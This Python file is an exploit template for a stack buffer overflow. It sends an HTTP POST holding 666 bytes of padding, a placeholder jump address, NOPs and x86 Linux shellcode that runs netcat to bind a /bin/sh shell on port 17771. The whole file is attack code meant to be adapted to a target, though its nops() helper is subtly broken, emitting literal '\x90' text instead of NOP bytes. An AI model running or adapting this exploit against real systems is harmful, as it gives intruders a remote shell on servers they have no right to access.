#!/usr/bin/env python
# $Id: template_class_exploit.py,v 1.0 2018/07/08 00:12:19 dhn Exp $

import struct
import socket
import argparse

class Exploit:

	def __init__(self, server, port, payload):
		self._payload = payload
		self._server = server
		self._port = port

	def __connect(self):
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((self._server, self._port))
		return s

	def run(self):
		try:
			s = self.__connect()
			print("[+] Sending payload to " + str(self._server))
			s.send((self._payload + "\r\n"))
			s.close()
		except socket.error:
			print("[!] socket error")

def p(x):
	return struct.pack("<L", x)

def nops(size=1024):
	return "\\x90" * size

def main(opt):
	# TODO: Change me!
	shellcode = (
		"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68"
		"\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73"
		"\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f"
		"\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62"
		"\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0"
		"\x0b\xcd\x80"
	)

	padding = "A" * 666
	jmp_esp = p(0xdeadbeef)

	# PAYLOAD
	payload = padding
	payload += jmp_esp
	payload += nops(10)
	payload += shellcode

	# REQUEST
	request = "POST / " + payload + " HTTP/1.1\r\n"
	request += "Host: 127.0.0.1\r\n\r\n"

	# RUN
	exploit = Exploit(opt.host, int(opt.port), request)
	exploit.run()

if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument("--host", help="Target hostname or ip", required=True)
	parser.add_argument("--port", help="Target port", required=True)
	args = parser.parse_args()

	main(args)
